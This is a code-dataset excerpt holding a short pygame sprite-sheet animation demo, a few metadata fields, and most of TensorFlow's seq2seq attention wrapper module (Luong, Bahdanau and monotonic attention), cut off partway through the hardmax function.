# trex image from Wyverii on http://opengameart.org/content/unsealed-terrex import sys import os sys.path.append(os.path.abspath('..')) import pygame from pygame.locals import * import pyganim pygame.init() # set up the window windowSurface = pygame.display.set_mode((320, 240), 0, 32) pygame.display.set_caption('Sprite Sheet Demo') # create the animation objects rects = [( 0, 154, 94, 77), ( 94, 154, 94, 77), (188, 154, 94, 77), (282, 154, 94, 77), (376, 154, 94, 77), (470, 154, 94, 77), (564, 154, 94, 77), (658, 154, 94, 77), (752, 154, 94, 77),] allImages = pyganim.getImagesFromSpriteSheet('terrex_0.png', rects=rects) frames = list(zip(allImages, [100] * len(allImages))) dinoAnim = pyganim.PygAnimation(frames) dinoAnim.play() # there is also a pause() and stop() method mainClock = pygame.time.Clock() BGCOLOR = (100, 50, 50) while True: windowSurface.fill(BGCOLOR) for event in pygame.event.get(): if event.type == QUIT or (event.type == KEYDOWN and event.key == K_ESCAPE): pygame.quit() sys.exit() dinoAnim.blit(windowSurface, (100, 50)) pygame.display.update() mainClock.tick(30) # Feel free to experiment with any FPS setting.
bsd-3-clause
-1,025,960,563,565,159,800
27.377778
83
0.633229
false
3.097087
false
false
false
Xeralux/tensorflow
tensorflow/contrib/seq2seq/python/ops/attention_wrapper.py
1
59833
# Copyright 2017 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """A powerful dynamic attention wrapper object.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections import functools import math import numpy as np from tensorflow.contrib.framework.python.framework import tensor_util from tensorflow.python.framework import dtypes from tensorflow.python.framework import ops from tensorflow.python.framework import tensor_shape from tensorflow.python.layers import base as layers_base from tensorflow.python.layers import core as layers_core from tensorflow.python.ops import array_ops from tensorflow.python.ops import check_ops from tensorflow.python.ops import clip_ops from tensorflow.python.ops import functional_ops from tensorflow.python.ops import init_ops from tensorflow.python.ops import math_ops from tensorflow.python.ops import nn_ops from tensorflow.python.ops import random_ops from tensorflow.python.ops import rnn_cell_impl from tensorflow.python.ops import tensor_array_ops from tensorflow.python.ops import variable_scope from tensorflow.python.util import nest __all__ = [ "AttentionMechanism", "AttentionWrapper", "AttentionWrapperState", "LuongAttention", "BahdanauAttention", "hardmax", "safe_cumprod", "monotonic_attention", "BahdanauMonotonicAttention", "LuongMonotonicAttention", ] _zero_state_tensors = rnn_cell_impl._zero_state_tensors # pylint: disable=protected-access class AttentionMechanism(object): @property def alignments_size(self): raise NotImplementedError @property def state_size(self): raise NotImplementedError def _prepare_memory(memory, memory_sequence_length, check_inner_dims_defined): """Convert to tensor and possibly mask `memory`. Args: memory: `Tensor`, shaped `[batch_size, max_time, ...]`. memory_sequence_length: `int32` `Tensor`, shaped `[batch_size]`. check_inner_dims_defined: Python boolean. If `True`, the `memory` argument's shape is checked to ensure all but the two outermost dimensions are fully defined. Returns: A (possibly masked), checked, new `memory`. Raises: ValueError: If `check_inner_dims_defined` is `True` and not `memory.shape[2:].is_fully_defined()`. """ memory = nest.map_structure( lambda m: ops.convert_to_tensor(m, name="memory"), memory) if memory_sequence_length is not None: memory_sequence_length = ops.convert_to_tensor( memory_sequence_length, name="memory_sequence_length") if check_inner_dims_defined: def _check_dims(m): if not m.get_shape()[2:].is_fully_defined(): raise ValueError("Expected memory %s to have fully defined inner dims, " "but saw shape: %s" % (m.name, m.get_shape())) nest.map_structure(_check_dims, memory) if memory_sequence_length is None: seq_len_mask = None else: seq_len_mask = array_ops.sequence_mask( memory_sequence_length, maxlen=array_ops.shape(nest.flatten(memory)[0])[1], dtype=nest.flatten(memory)[0].dtype) seq_len_batch_size = ( memory_sequence_length.shape[0].value or array_ops.shape(memory_sequence_length)[0]) def _maybe_mask(m, seq_len_mask): rank = m.get_shape().ndims rank = rank if rank is not None else array_ops.rank(m) extra_ones = array_ops.ones(rank - 2, dtype=dtypes.int32) m_batch_size = m.shape[0].value or array_ops.shape(m)[0] if memory_sequence_length is not None: message = ("memory_sequence_length and memory tensor batch sizes do not " "match.") with ops.control_dependencies([ check_ops.assert_equal( seq_len_batch_size, m_batch_size, message=message)]): seq_len_mask = array_ops.reshape( seq_len_mask, array_ops.concat((array_ops.shape(seq_len_mask), extra_ones), 0)) return m * seq_len_mask else: return m return nest.map_structure(lambda m: _maybe_mask(m, seq_len_mask), memory) def _maybe_mask_score(score, memory_sequence_length, score_mask_value): if memory_sequence_length is None: return score message = ("All values in memory_sequence_length must greater than zero.") with ops.control_dependencies( [check_ops.assert_positive(memory_sequence_length, message=message)]): score_mask = array_ops.sequence_mask( memory_sequence_length, maxlen=array_ops.shape(score)[1]) score_mask_values = score_mask_value * array_ops.ones_like(score) return array_ops.where(score_mask, score, score_mask_values) class _BaseAttentionMechanism(AttentionMechanism): """A base AttentionMechanism class providing common functionality. Common functionality includes: 1. Storing the query and memory layers. 2. Preprocessing and storing the memory. """ def __init__(self, query_layer, memory, probability_fn, memory_sequence_length=None, memory_layer=None, check_inner_dims_defined=True, score_mask_value=None, name=None): """Construct base AttentionMechanism class. Args: query_layer: Callable. Instance of `tf.layers.Layer`. The layer's depth must match the depth of `memory_layer`. If `query_layer` is not provided, the shape of `query` must match that of `memory_layer`. memory: The memory to query; usually the output of an RNN encoder. This tensor should be shaped `[batch_size, max_time, ...]`. probability_fn: A `callable`. Converts the score and previous alignments to probabilities. Its signature should be: `probabilities = probability_fn(score, state)`. memory_sequence_length (optional): Sequence lengths for the batch entries in memory. If provided, the memory tensor rows are masked with zeros for values past the respective sequence lengths. memory_layer: Instance of `tf.layers.Layer` (may be None). The layer's depth must match the depth of `query_layer`. If `memory_layer` is not provided, the shape of `memory` must match that of `query_layer`. check_inner_dims_defined: Python boolean. If `True`, the `memory` argument's shape is checked to ensure all but the two outermost dimensions are fully defined. score_mask_value: (optional): The mask value for score before passing into `probability_fn`. The default is -inf. Only used if `memory_sequence_length` is not None. name: Name to use when creating ops. """ if (query_layer is not None and not isinstance(query_layer, layers_base.Layer)): raise TypeError( "query_layer is not a Layer: %s" % type(query_layer).__name__) if (memory_layer is not None and not isinstance(memory_layer, layers_base.Layer)): raise TypeError( "memory_layer is not a Layer: %s" % type(memory_layer).__name__) self._query_layer = query_layer self._memory_layer = memory_layer self.dtype = memory_layer.dtype if not callable(probability_fn): raise TypeError("probability_fn must be callable, saw type: %s" % type(probability_fn).__name__) if score_mask_value is None: score_mask_value = dtypes.as_dtype( self._memory_layer.dtype).as_numpy_dtype(-np.inf) self._probability_fn = lambda score, prev: ( # pylint:disable=g-long-lambda probability_fn( _maybe_mask_score(score, memory_sequence_length, score_mask_value), prev)) with ops.name_scope( name, "BaseAttentionMechanismInit", nest.flatten(memory)): self._values = _prepare_memory( memory, memory_sequence_length, check_inner_dims_defined=check_inner_dims_defined) self._keys = ( self.memory_layer(self._values) if self.memory_layer # pylint: disable=not-callable else self._values) self._batch_size = ( self._keys.shape[0].value or array_ops.shape(self._keys)[0]) self._alignments_size = (self._keys.shape[1].value or array_ops.shape(self._keys)[1]) @property def memory_layer(self): return self._memory_layer @property def query_layer(self): return self._query_layer @property def values(self): return self._values @property def keys(self): return self._keys @property def batch_size(self): return self._batch_size @property def alignments_size(self): return self._alignments_size @property def state_size(self): return self._alignments_size def initial_alignments(self, batch_size, dtype): """Creates the initial alignment values for the `AttentionWrapper` class. This is important for AttentionMechanisms that use the previous alignment to calculate the alignment at the next time step (e.g. monotonic attention). The default behavior is to return a tensor of all zeros. Args: batch_size: `int32` scalar, the batch_size. dtype: The `dtype`. Returns: A `dtype` tensor shaped `[batch_size, alignments_size]` (`alignments_size` is the values' `max_time`). """ max_time = self._alignments_size return _zero_state_tensors(max_time, batch_size, dtype) def initial_state(self, batch_size, dtype): """Creates the initial state values for the `AttentionWrapper` class. This is important for AttentionMechanisms that use the previous alignment to calculate the alignment at the next time step (e.g. monotonic attention). The default behavior is to return the same output as initial_alignments. Args: batch_size: `int32` scalar, the batch_size. dtype: The `dtype`. Returns: A structure of all-zero tensors with shapes as described by `state_size`. """ return self.initial_alignments(batch_size, dtype) def _luong_score(query, keys, scale): """Implements Luong-style (multiplicative) scoring function. This attention has two forms. The first is standard Luong attention, as described in: Minh-Thang Luong, Hieu Pham, Christopher D. Manning. "Effective Approaches to Attention-based Neural Machine Translation." EMNLP 2015. https://arxiv.org/abs/1508.04025 The second is the scaled form inspired partly by the normalized form of Bahdanau attention. To enable the second form, call this function with `scale=True`. Args: query: Tensor, shape `[batch_size, num_units]` to compare to keys. keys: Processed memory, shape `[batch_size, max_time, num_units]`. scale: Whether to apply a scale to the score function. Returns: A `[batch_size, max_time]` tensor of unnormalized score values. Raises: ValueError: If `key` and `query` depths do not match. """ depth = query.get_shape()[-1] key_units = keys.get_shape()[-1] if depth != key_units: raise ValueError( "Incompatible or unknown inner dimensions between query and keys. " "Query (%s) has units: %s. Keys (%s) have units: %s. " "Perhaps you need to set num_units to the keys' dimension (%s)?" % (query, depth, keys, key_units, key_units)) dtype = query.dtype # Reshape from [batch_size, depth] to [batch_size, 1, depth] # for matmul. query = array_ops.expand_dims(query, 1) # Inner product along the query units dimension. # matmul shapes: query is [batch_size, 1, depth] and # keys is [batch_size, max_time, depth]. # the inner product is asked to **transpose keys' inner shape** to get a # batched matmul on: # [batch_size, 1, depth] . [batch_size, depth, max_time] # resulting in an output shape of: # [batch_size, 1, max_time]. # we then squeeze out the center singleton dimension. score = math_ops.matmul(query, keys, transpose_b=True) score = array_ops.squeeze(score, [1]) if scale: # Scalar used in weight scaling g = variable_scope.get_variable( "attention_g", dtype=dtype, initializer=1.) score = g * score return score class LuongAttention(_BaseAttentionMechanism): """Implements Luong-style (multiplicative) attention scoring. This attention has two forms. The first is standard Luong attention, as described in: Minh-Thang Luong, Hieu Pham, Christopher D. Manning. "Effective Approaches to Attention-based Neural Machine Translation." EMNLP 2015. https://arxiv.org/abs/1508.04025 The second is the scaled form inspired partly by the normalized form of Bahdanau attention. To enable the second form, construct the object with parameter `scale=True`. """ def __init__(self, num_units, memory, memory_sequence_length=None, scale=False, probability_fn=None, score_mask_value=None, dtype=None, name="LuongAttention"): """Construct the AttentionMechanism mechanism. Args: num_units: The depth of the attention mechanism. memory: The memory to query; usually the output of an RNN encoder. This tensor should be shaped `[batch_size, max_time, ...]`. memory_sequence_length: (optional) Sequence lengths for the batch entries in memory. If provided, the memory tensor rows are masked with zeros for values past the respective sequence lengths. scale: Python boolean. Whether to scale the energy term. probability_fn: (optional) A `callable`. Converts the score to probabilities. The default is @{tf.nn.softmax}. Other options include @{tf.contrib.seq2seq.hardmax} and @{tf.contrib.sparsemax.sparsemax}. Its signature should be: `probabilities = probability_fn(score)`. score_mask_value: (optional) The mask value for score before passing into `probability_fn`. The default is -inf. Only used if `memory_sequence_length` is not None. dtype: The data type for the memory layer of the attention mechanism. name: Name to use when creating ops. """ # For LuongAttention, we only transform the memory layer; thus # num_units **must** match expected the query depth. if probability_fn is None: probability_fn = nn_ops.softmax if dtype is None: dtype = dtypes.float32 wrapped_probability_fn = lambda score, _: probability_fn(score) super(LuongAttention, self).__init__( query_layer=None, memory_layer=layers_core.Dense( num_units, name="memory_layer", use_bias=False, dtype=dtype), memory=memory, probability_fn=wrapped_probability_fn, memory_sequence_length=memory_sequence_length, score_mask_value=score_mask_value, name=name) self._num_units = num_units self._scale = scale self._name = name def __call__(self, query, state): """Score the query based on the keys and values. Args: query: Tensor of dtype matching `self.values` and shape `[batch_size, query_depth]`. state: Tensor of dtype matching `self.values` and shape `[batch_size, alignments_size]` (`alignments_size` is memory's `max_time`). Returns: alignments: Tensor of dtype matching `self.values` and shape `[batch_size, alignments_size]` (`alignments_size` is memory's `max_time`). """ with variable_scope.variable_scope(None, "luong_attention", [query]): score = _luong_score(query, self._keys, self._scale) alignments = self._probability_fn(score, state) next_state = alignments return alignments, next_state def _bahdanau_score(processed_query, keys, normalize): """Implements Bahdanau-style (additive) scoring function. This attention has two forms. The first is Bhandanau attention, as described in: Dzmitry Bahdanau, Kyunghyun Cho, Yoshua Bengio. "Neural Machine Translation by Jointly Learning to Align and Translate." ICLR 2015. https://arxiv.org/abs/1409.0473 The second is the normalized form. This form is inspired by the weight normalization article: Tim Salimans, Diederik P. Kingma. "Weight Normalization: A Simple Reparameterization to Accelerate Training of Deep Neural Networks." https://arxiv.org/abs/1602.07868 To enable the second form, set `normalize=True`. Args: processed_query: Tensor, shape `[batch_size, num_units]` to compare to keys. keys: Processed memory, shape `[batch_size, max_time, num_units]`. normalize: Whether to normalize the score function. Returns: A `[batch_size, max_time]` tensor of unnormalized score values. """ dtype = processed_query.dtype # Get the number of hidden units from the trailing dimension of keys num_units = keys.shape[2].value or array_ops.shape(keys)[2] # Reshape from [batch_size, ...] to [batch_size, 1, ...] for broadcasting. processed_query = array_ops.expand_dims(processed_query, 1) v = variable_scope.get_variable( "attention_v", [num_units], dtype=dtype) if normalize: # Scalar used in weight normalization g = variable_scope.get_variable( "attention_g", dtype=dtype, initializer=math.sqrt((1. / num_units))) # Bias added prior to the nonlinearity b = variable_scope.get_variable( "attention_b", [num_units], dtype=dtype, initializer=init_ops.zeros_initializer()) # normed_v = g * v / ||v|| normed_v = g * v * math_ops.rsqrt( math_ops.reduce_sum(math_ops.square(v))) return math_ops.reduce_sum( normed_v * math_ops.tanh(keys + processed_query + b), [2]) else: return math_ops.reduce_sum(v * math_ops.tanh(keys + processed_query), [2]) class BahdanauAttention(_BaseAttentionMechanism): """Implements Bahdanau-style (additive) attention. This attention has two forms. The first is Bahdanau attention, as described in: Dzmitry Bahdanau, Kyunghyun Cho, Yoshua Bengio. "Neural Machine Translation by Jointly Learning to Align and Translate." ICLR 2015. https://arxiv.org/abs/1409.0473 The second is the normalized form. This form is inspired by the weight normalization article: Tim Salimans, Diederik P. Kingma. "Weight Normalization: A Simple Reparameterization to Accelerate Training of Deep Neural Networks." https://arxiv.org/abs/1602.07868 To enable the second form, construct the object with parameter `normalize=True`. """ def __init__(self, num_units, memory, memory_sequence_length=None, normalize=False, probability_fn=None, score_mask_value=None, dtype=None, name="BahdanauAttention"): """Construct the Attention mechanism. Args: num_units: The depth of the query mechanism. memory: The memory to query; usually the output of an RNN encoder. This tensor should be shaped `[batch_size, max_time, ...]`. memory_sequence_length (optional): Sequence lengths for the batch entries in memory. If provided, the memory tensor rows are masked with zeros for values past the respective sequence lengths. normalize: Python boolean. Whether to normalize the energy term. probability_fn: (optional) A `callable`. Converts the score to probabilities. The default is @{tf.nn.softmax}. Other options include @{tf.contrib.seq2seq.hardmax} and @{tf.contrib.sparsemax.sparsemax}. Its signature should be: `probabilities = probability_fn(score)`. score_mask_value: (optional): The mask value for score before passing into `probability_fn`. The default is -inf. Only used if `memory_sequence_length` is not None. dtype: The data type for the query and memory layers of the attention mechanism. name: Name to use when creating ops. """ if probability_fn is None: probability_fn = nn_ops.softmax if dtype is None: dtype = dtypes.float32 wrapped_probability_fn = lambda score, _: probability_fn(score) super(BahdanauAttention, self).__init__( query_layer=layers_core.Dense( num_units, name="query_layer", use_bias=False, dtype=dtype), memory_layer=layers_core.Dense( num_units, name="memory_layer", use_bias=False, dtype=dtype), memory=memory, probability_fn=wrapped_probability_fn, memory_sequence_length=memory_sequence_length, score_mask_value=score_mask_value, name=name) self._num_units = num_units self._normalize = normalize self._name = name def __call__(self, query, state): """Score the query based on the keys and values. Args: query: Tensor of dtype matching `self.values` and shape `[batch_size, query_depth]`. state: Tensor of dtype matching `self.values` and shape `[batch_size, alignments_size]` (`alignments_size` is memory's `max_time`). Returns: alignments: Tensor of dtype matching `self.values` and shape `[batch_size, alignments_size]` (`alignments_size` is memory's `max_time`). """ with variable_scope.variable_scope(None, "bahdanau_attention", [query]): processed_query = self.query_layer(query) if self.query_layer else query score = _bahdanau_score(processed_query, self._keys, self._normalize) alignments = self._probability_fn(score, state) next_state = alignments return alignments, next_state def safe_cumprod(x, *args, **kwargs): """Computes cumprod of x in logspace using cumsum to avoid underflow. The cumprod function and its gradient can result in numerical instabilities when its argument has very small and/or zero values. As long as the argument is all positive, we can instead compute the cumulative product as exp(cumsum(log(x))). This function can be called identically to tf.cumprod. Args: x: Tensor to take the cumulative product of. *args: Passed on to cumsum; these are identical to those in cumprod. **kwargs: Passed on to cumsum; these are identical to those in cumprod. Returns: Cumulative product of x. """ with ops.name_scope(None, "SafeCumprod", [x]): x = ops.convert_to_tensor(x, name="x") tiny = np.finfo(x.dtype.as_numpy_dtype).tiny return math_ops.exp(math_ops.cumsum( math_ops.log(clip_ops.clip_by_value(x, tiny, 1)), *args, **kwargs)) def monotonic_attention(p_choose_i, previous_attention, mode): """Compute monotonic attention distribution from choosing probabilities. Monotonic attention implies that the input sequence is processed in an explicitly left-to-right manner when generating the output sequence. In addition, once an input sequence element is attended to at a given output timestep, elements occurring before it cannot be attended to at subsequent output timesteps. This function generates attention distributions according to these assumptions. For more information, see ``Online and Linear-Time Attention by Enforcing Monotonic Alignments''. Args: p_choose_i: Probability of choosing input sequence/memory element i. Should be of shape (batch_size, input_sequence_length), and should all be in the range [0, 1]. previous_attention: The attention distribution from the previous output timestep. Should be of shape (batch_size, input_sequence_length). For the first output timestep, preevious_attention[n] should be [1, 0, 0, ..., 0] for all n in [0, ... batch_size - 1]. mode: How to compute the attention distribution. Must be one of 'recursive', 'parallel', or 'hard'. * 'recursive' uses tf.scan to recursively compute the distribution. This is slowest but is exact, general, and does not suffer from numerical instabilities. * 'parallel' uses parallelized cumulative-sum and cumulative-product operations to compute a closed-form solution to the recurrence relation defining the attention distribution. This makes it more efficient than 'recursive', but it requires numerical checks which make the distribution non-exact. This can be a problem in particular when input_sequence_length is long and/or p_choose_i has entries very close to 0 or 1. * 'hard' requires that the probabilities in p_choose_i are all either 0 or 1, and subsequently uses a more efficient and exact solution. Returns: A tensor of shape (batch_size, input_sequence_length) representing the attention distributions for each sequence in the batch. Raises: ValueError: mode is not one of 'recursive', 'parallel', 'hard'. """ # Force things to be tensors p_choose_i = ops.convert_to_tensor(p_choose_i, name="p_choose_i") previous_attention = ops.convert_to_tensor( previous_attention, name="previous_attention") if mode == "recursive": # Use .shape[0].value when it's not None, or fall back on symbolic shape batch_size = p_choose_i.shape[0].value or array_ops.shape(p_choose_i)[0] # Compute [1, 1 - p_choose_i[0], 1 - p_choose_i[1], ..., 1 - p_choose_i[-2]] shifted_1mp_choose_i = array_ops.concat( [array_ops.ones((batch_size, 1)), 1 - p_choose_i[:, :-1]], 1) # Compute attention distribution recursively as # q[i] = (1 - p_choose_i[i])*q[i - 1] + previous_attention[i] # attention[i] = p_choose_i[i]*q[i] attention = p_choose_i*array_ops.transpose(functional_ops.scan( # Need to use reshape to remind TF of the shape between loop iterations lambda x, yz: array_ops.reshape(yz[0]*x + yz[1], (batch_size,)), # Loop variables yz[0] and yz[1] [array_ops.transpose(shifted_1mp_choose_i), array_ops.transpose(previous_attention)], # Initial value of x is just zeros array_ops.zeros((batch_size,)))) elif mode == "parallel": # safe_cumprod computes cumprod in logspace with numeric checks cumprod_1mp_choose_i = safe_cumprod(1 - p_choose_i, axis=1, exclusive=True) # Compute recurrence relation solution attention = p_choose_i*cumprod_1mp_choose_i*math_ops.cumsum( previous_attention / # Clip cumprod_1mp to avoid divide-by-zero clip_ops.clip_by_value(cumprod_1mp_choose_i, 1e-10, 1.), axis=1) elif mode == "hard": # Remove any probabilities before the index chosen last time step p_choose_i *= math_ops.cumsum(previous_attention, axis=1) # Now, use exclusive cumprod to remove probabilities after the first # chosen index, like so: # p_choose_i = [0, 0, 0, 1, 1, 0, 1, 1] # cumprod(1 - p_choose_i, exclusive=True) = [1, 1, 1, 1, 0, 0, 0, 0] # Product of above: [0, 0, 0, 1, 0, 0, 0, 0] attention = p_choose_i*math_ops.cumprod( 1 - p_choose_i, axis=1, exclusive=True) else: raise ValueError("mode must be 'recursive', 'parallel', or 'hard'.") return attention def _monotonic_probability_fn(score, previous_alignments, sigmoid_noise, mode, seed=None): """Attention probability function for monotonic attention. Takes in unnormalized attention scores, adds pre-sigmoid noise to encourage the model to make discrete attention decisions, passes them through a sigmoid to obtain "choosing" probabilities, and then calls monotonic_attention to obtain the attention distribution. For more information, see Colin Raffel, Minh-Thang Luong, Peter J. Liu, Ron J. Weiss, Douglas Eck, "Online and Linear-Time Attention by Enforcing Monotonic Alignments." ICML 2017. https://arxiv.org/abs/1704.00784 Args: score: Unnormalized attention scores, shape `[batch_size, alignments_size]` previous_alignments: Previous attention distribution, shape `[batch_size, alignments_size]` sigmoid_noise: Standard deviation of pre-sigmoid noise. Setting this larger than 0 will encourage the model to produce large attention scores, effectively making the choosing probabilities discrete and the resulting attention distribution one-hot. It should be set to 0 at test-time, and when hard attention is not desired. mode: How to compute the attention distribution. Must be one of 'recursive', 'parallel', or 'hard'. See the docstring for `tf.contrib.seq2seq.monotonic_attention` for more information. seed: (optional) Random seed for pre-sigmoid noise. Returns: A `[batch_size, alignments_size]`-shape tensor corresponding to the resulting attention distribution. """ # Optionally add pre-sigmoid noise to the scores if sigmoid_noise > 0: noise = random_ops.random_normal(array_ops.shape(score), dtype=score.dtype, seed=seed) score += sigmoid_noise*noise # Compute "choosing" probabilities from the attention scores if mode == "hard": # When mode is hard, use a hard sigmoid p_choose_i = math_ops.cast(score > 0, score.dtype) else: p_choose_i = math_ops.sigmoid(score) # Convert from choosing probabilities to attention distribution return monotonic_attention(p_choose_i, previous_alignments, mode) class _BaseMonotonicAttentionMechanism(_BaseAttentionMechanism): """Base attention mechanism for monotonic attention. Simply overrides the initial_alignments function to provide a dirac distribution,which is needed in order for the monotonic attention distributions to have the correct behavior. """ def initial_alignments(self, batch_size, dtype): """Creates the initial alignment values for the monotonic attentions. Initializes to dirac distributions, i.e. [1, 0, 0, ...memory length..., 0] for all entries in the batch. Args: batch_size: `int32` scalar, the batch_size. dtype: The `dtype`. Returns: A `dtype` tensor shaped `[batch_size, alignments_size]` (`alignments_size` is the values' `max_time`). """ max_time = self._alignments_size return array_ops.one_hot( array_ops.zeros((batch_size,), dtype=dtypes.int32), max_time, dtype=dtype) class BahdanauMonotonicAttention(_BaseMonotonicAttentionMechanism): """Monotonic attention mechanism with Bahadanau-style energy function. This type of attention encorces a monotonic constraint on the attention distributions; that is once the model attends to a given point in the memory it can't attend to any prior points at subsequence output timesteps. It achieves this by using the _monotonic_probability_fn instead of softmax to construct its attention distributions. Since the attention scores are passed through a sigmoid, a learnable scalar bias parameter is applied after the score function and before the sigmoid. Otherwise, it is equivalent to BahdanauAttention. This approach is proposed in Colin Raffel, Minh-Thang Luong, Peter J. Liu, Ron J. Weiss, Douglas Eck, "Online and Linear-Time Attention by Enforcing Monotonic Alignments." ICML 2017. https://arxiv.org/abs/1704.00784 """ def __init__(self, num_units, memory, memory_sequence_length=None, normalize=False, score_mask_value=None, sigmoid_noise=0., sigmoid_noise_seed=None, score_bias_init=0., mode="parallel", dtype=None, name="BahdanauMonotonicAttention"): """Construct the Attention mechanism. Args: num_units: The depth of the query mechanism. memory: The memory to query; usually the output of an RNN encoder. This tensor should be shaped `[batch_size, max_time, ...]`. memory_sequence_length (optional): Sequence lengths for the batch entries in memory. If provided, the memory tensor rows are masked with zeros for values past the respective sequence lengths. normalize: Python boolean. Whether to normalize the energy term. score_mask_value: (optional): The mask value for score before passing into `probability_fn`. The default is -inf. Only used if `memory_sequence_length` is not None. sigmoid_noise: Standard deviation of pre-sigmoid noise. See the docstring for `_monotonic_probability_fn` for more information. sigmoid_noise_seed: (optional) Random seed for pre-sigmoid noise. score_bias_init: Initial value for score bias scalar. It's recommended to initialize this to a negative value when the length of the memory is large. mode: How to compute the attention distribution. Must be one of 'recursive', 'parallel', or 'hard'. See the docstring for `tf.contrib.seq2seq.monotonic_attention` for more information. dtype: The data type for the query and memory layers of the attention mechanism. name: Name to use when creating ops. """ # Set up the monotonic probability fn with supplied parameters if dtype is None: dtype = dtypes.float32 wrapped_probability_fn = functools.partial( _monotonic_probability_fn, sigmoid_noise=sigmoid_noise, mode=mode, seed=sigmoid_noise_seed) super(BahdanauMonotonicAttention, self).__init__( query_layer=layers_core.Dense( num_units, name="query_layer", use_bias=False, dtype=dtype), memory_layer=layers_core.Dense( num_units, name="memory_layer", use_bias=False, dtype=dtype), memory=memory, probability_fn=wrapped_probability_fn, memory_sequence_length=memory_sequence_length, score_mask_value=score_mask_value, name=name) self._num_units = num_units self._normalize = normalize self._name = name self._score_bias_init = score_bias_init def __call__(self, query, state): """Score the query based on the keys and values. Args: query: Tensor of dtype matching `self.values` and shape `[batch_size, query_depth]`. state: Tensor of dtype matching `self.values` and shape `[batch_size, alignments_size]` (`alignments_size` is memory's `max_time`). Returns: alignments: Tensor of dtype matching `self.values` and shape `[batch_size, alignments_size]` (`alignments_size` is memory's `max_time`). """ with variable_scope.variable_scope( None, "bahdanau_monotonic_attention", [query]): processed_query = self.query_layer(query) if self.query_layer else query score = _bahdanau_score(processed_query, self._keys, self._normalize) score_bias = variable_scope.get_variable( "attention_score_bias", dtype=processed_query.dtype, initializer=self._score_bias_init) score += score_bias alignments = self._probability_fn(score, state) next_state = alignments return alignments, next_state class LuongMonotonicAttention(_BaseMonotonicAttentionMechanism): """Monotonic attention mechanism with Luong-style energy function. This type of attention encorces a monotonic constraint on the attention distributions; that is once the model attends to a given point in the memory it can't attend to any prior points at subsequence output timesteps. It achieves this by using the _monotonic_probability_fn instead of softmax to construct its attention distributions. Otherwise, it is equivalent to LuongAttention. This approach is proposed in Colin Raffel, Minh-Thang Luong, Peter J. Liu, Ron J. Weiss, Douglas Eck, "Online and Linear-Time Attention by Enforcing Monotonic Alignments." ICML 2017. https://arxiv.org/abs/1704.00784 """ def __init__(self, num_units, memory, memory_sequence_length=None, scale=False, score_mask_value=None, sigmoid_noise=0., sigmoid_noise_seed=None, score_bias_init=0., mode="parallel", dtype=None, name="LuongMonotonicAttention"): """Construct the Attention mechanism. Args: num_units: The depth of the query mechanism. memory: The memory to query; usually the output of an RNN encoder. This tensor should be shaped `[batch_size, max_time, ...]`. memory_sequence_length (optional): Sequence lengths for the batch entries in memory. If provided, the memory tensor rows are masked with zeros for values past the respective sequence lengths. scale: Python boolean. Whether to scale the energy term. score_mask_value: (optional): The mask value for score before passing into `probability_fn`. The default is -inf. Only used if `memory_sequence_length` is not None. sigmoid_noise: Standard deviation of pre-sigmoid noise. See the docstring for `_monotonic_probability_fn` for more information. sigmoid_noise_seed: (optional) Random seed for pre-sigmoid noise. score_bias_init: Initial value for score bias scalar. It's recommended to initialize this to a negative value when the length of the memory is large. mode: How to compute the attention distribution. Must be one of 'recursive', 'parallel', or 'hard'. See the docstring for `tf.contrib.seq2seq.monotonic_attention` for more information. dtype: The data type for the query and memory layers of the attention mechanism. name: Name to use when creating ops. """ # Set up the monotonic probability fn with supplied parameters if dtype is None: dtype = dtypes.float32 wrapped_probability_fn = functools.partial( _monotonic_probability_fn, sigmoid_noise=sigmoid_noise, mode=mode, seed=sigmoid_noise_seed) super(LuongMonotonicAttention, self).__init__( query_layer=None, memory_layer=layers_core.Dense( num_units, name="memory_layer", use_bias=False, dtype=dtype), memory=memory, probability_fn=wrapped_probability_fn, memory_sequence_length=memory_sequence_length, score_mask_value=score_mask_value, name=name) self._num_units = num_units self._scale = scale self._score_bias_init = score_bias_init self._name = name def __call__(self, query, state): """Score the query based on the keys and values. Args: query: Tensor of dtype matching `self.values` and shape `[batch_size, query_depth]`. state: Tensor of dtype matching `self.values` and shape `[batch_size, alignments_size]` (`alignments_size` is memory's `max_time`). Returns: alignments: Tensor of dtype matching `self.values` and shape `[batch_size, alignments_size]` (`alignments_size` is memory's `max_time`). """ with variable_scope.variable_scope(None, "luong_monotonic_attention", [query]): score = _luong_score(query, self._keys, self._scale) score_bias = variable_scope.get_variable( "attention_score_bias", dtype=query.dtype, initializer=self._score_bias_init) score += score_bias alignments = self._probability_fn(score, state) next_state = alignments return alignments, next_state class AttentionWrapperState( collections.namedtuple("AttentionWrapperState", ("cell_state", "attention", "time", "alignments", "alignment_history", "attention_state"))): """`namedtuple` storing the state of a `AttentionWrapper`. Contains: - `cell_state`: The state of the wrapped `RNNCell` at the previous time step. - `attention`: The attention emitted at the previous time step. - `time`: int32 scalar containing the current time step. - `alignments`: A single or tuple of `Tensor`(s) containing the alignments emitted at the previous time step for each attention mechanism. - `alignment_history`: (if enabled) a single or tuple of `TensorArray`(s) containing alignment matrices from all time steps for each attention mechanism. Call `stack()` on each to convert to a `Tensor`. - `attention_state`: A single or tuple of nested objects containing attention mechanism state for each attention mechanism. The objects may contain Tensors or TensorArrays. """ def clone(self, **kwargs): """Clone this object, overriding components provided by kwargs. The new state fields' shape must match original state fields' shape. This will be validated, and original fields' shape will be propagated to new fields. Example: ```python initial_state = attention_wrapper.zero_state(dtype=..., batch_size=...) initial_state = initial_state.clone(cell_state=encoder_state) ``` Args: **kwargs: Any properties of the state object to replace in the returned `AttentionWrapperState`. Returns: A new `AttentionWrapperState` whose properties are the same as this one, except any overridden properties as provided in `kwargs`. """ def with_same_shape(old, new): """Check and set new tensor's shape.""" if isinstance(old, ops.Tensor) and isinstance(new, ops.Tensor): return tensor_util.with_same_shape(old, new) return new return nest.map_structure( with_same_shape, self, super(AttentionWrapperState, self)._replace(**kwargs)) def hardmax(logits, name=None): """Returns batched one-hot vectors. The depth index containing the `1` is that of the maximum logit value. Args: logits: A batch tensor of logit values. name: Name to use when creating ops. Returns: A batched one-hot tensor. """ with ops.name_scope(name, 